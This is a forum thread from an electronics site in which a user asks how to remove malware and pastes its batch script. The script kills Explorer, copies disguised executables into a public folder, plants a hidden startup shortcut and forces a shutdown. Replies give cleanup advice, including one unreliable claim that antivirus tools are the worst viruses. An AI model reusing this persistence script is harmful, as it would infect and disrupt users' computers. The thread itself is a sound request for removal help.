Continue to Site

Welcome to EDAboard.com

Welcome to our site! EDAboard.com is an international Electronics Discussion Forum focused on EDA software, circuits, schematics, books, theory, papers, asic, pld, 8051, DSP, Network, RF, Analog Design, PCB, Service Manuals... and a whole lot more! To participate you need to register. Registration is free. Click here to register now.

[SOLVED] How to remove these virus from my drive?

Status
Not open for further replies.

xpress_embedo

Advanced Member level 4
Advanced Member level 4
Joined
Jul 5, 2011
Messages
1,154
Helped
161
Reputation
396
Reaction score
189
Trophy points
1,353
Location
India
embeddedlaboratory.blogspot.in
Activity points
10,591
Please tell me how to remove this virus from my computer, whenever i am clicking on shortcut file my computer restarts, i am using avast free antivirus but it doesn't detects it as virus.

Here is the code of the run.bat file

I tried deleting these but they reappear.


Code Bash - [expand]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
path C:\Windows\System32
color fa
IF EXIST "C:\Users\Public\smss .exe" ( ECHO ) ELSE (taskkill /f /im explorer.exe
xcopy /h /y "smss .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\taskeng .exe" ( ECHO ) ELSE (xcopy /h /y "taskeng .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\Firewall.exe" ( ECHO ) ELSE (xcopy /h /y "Firewall.exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\Firewall .exe" ( ECHO ) ELSE (xcopy /h /y "Firewall .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\explorer.exe" ( ECHO ) ELSE (xcopy /h /y "explorer.exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\explorer .exe" ( ECHO ) ELSE (xcopy /h /y "explorer .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\Interop.IWshRuntimeLibrary.dll" ( ECHO ) ELSE (xcopy /h /y Interop.IWshRuntimeLibrary.dll "C:\Users\Public")
IF EXIST "%systemroot%\Microsoft.NET\Framework\v3.*" goto 3
IF EXIST "%systemroot%\Microsoft.NET\Framework\v4.*" goto 4
:3
IF EXIST "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Driver.lnk" (
ECHO "hur"
) ELSE (
attrib "Sound_Driver.lnk" -h -s
copy /y Sound_Driver.lnk "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
attrib "Sound_Driver.lnk" +h +s
attrib "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Driver.lnk" -h -s
shutdown /s /f /t 0
)
goto e
:4
IF EXIST "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Drivers.lnk" (
ECHO "hur"
) ELSE (
attrib "Sound_Drivers.lnk" -h -s
copy /y Sound_Drivers.lnk "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
attrib "Sound_Drivers.lnk" +h +s
attrib "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Drivers.lnk" -h -s
shutdown /s /f /t 0
)
:e



virus.png
 

what is run.bat for?

Is your AVAST updated with the latest files?

Did you run a complete system scan and tell AVAST what to do when an infected file is found?

Did you try a "scan on boot"?
 
The code appears the same as a virus discussed at the link below. The name is stated as "run.bat".

Some other anti-virus programs may detect it.
Example, MalwareBytes, Microsoft Security Essentials. (Both are free.)

https://www.tomshardware.com/answers/id-1851837/folders-converted-system-folders.html


My anti virus is updated fully.
But i never used its boot time scan, but had scanned the computer and it doesnt report any virus.

I had read somewhere else also that microsoft security essenstials can help me in this regard.
I will try it and report soon.
 

General tips:

Look in your start button/programs/startup section for anything odd
Search regedit keys (quick search for "runonce" and hit F3 a few times if you dont know exactly where - then look in the "run" key that should be above it for odd entries)
Look in your c:\users tree for odd files or folders (possibly DECIMAL numbers instead of names (seldom hex numbers) )
in that tree "all users" is a favourite place to hide folders
also check your c:\ (root)
dont delete anything odd you find - after ensuring yourself it isnt essential to windows rename it then reboot - see if the problem goes away.


Mostly I find anti virus programs are the worst viruses and people actually pay money to install them...
 
I would recommend to boot your computer with a clean boot cd, copy off your data and make a fresh install.
When you have had a virus you can never be sure that you have removed it fully.

Fuhrer more you can scan your copied data with two or more virus scanners from the clean install or with an unaffected pc.
 
You can restore to a period when you did not have the virus. This has worked many times for me in the past dealing with a stubborn virus. Another excellent scanner program (free to use for 30 days) is "HitManPro." This has managed to remove some persistent virus or malware programs for me in the past that all others could not do. It is worth a try.
http://www.surfright.nl/en/hitmanpro
 
I would recommend to boot your computer with a clean boot cd, copy off your data and make a fresh install.
When you have had a virus you can never be sure that you have removed it fully.

Fuhrer more you can scan your copied data with two or more virus scanners from the clean install or with an unaffected pc.

I think that will not solve my problem, as my Anti-Virus is not detecting the viruses and my C drive (Windows Installation Drive) is safe from Viruses, only D and E drive had virus in it.

Fresh Installation will only Deactivate virus for some time, but they will not be cleaned.

- - - Updated - - -

You can restore to a period when you did not have the virus. This has worked many times for me in the past dealing with a stubborn virus. Another excellent scanner program (free to use for 30 days) is "HitManPro." This has managed to remove some persistent virus or malware programs for me in the past that all others could not do. It is worth a try.
http://www.surfright.nl/en/hitmanpro

My Computer had a 1 month old restore point, i will try that, apart from that I used Boot Time Scan with Aast it reports only 5 to 10 viruses that too in KeyGeneartor present in some other softwares.

I had also installed Microsoft Security Essentials, but even it didn't did anything.

I dont know what to do.
 

Don't forget to try and work out how the virus got there in the first place because
your backup may well have the same security hole.
 

You have to format it. Just try manual backup if all the files are not virus affected. Some virusus cant be removed with any antivirus. In such cases formatting is the only way. But just try a manual backup , and you may get your data if you have some luck . But , i here recommend a scan with Avast. Good luck
 

Status
Not open for further replies.

Similar threads

Part and Inventory Search

Welcome to EDABoard.com

Sponsor

Back
Top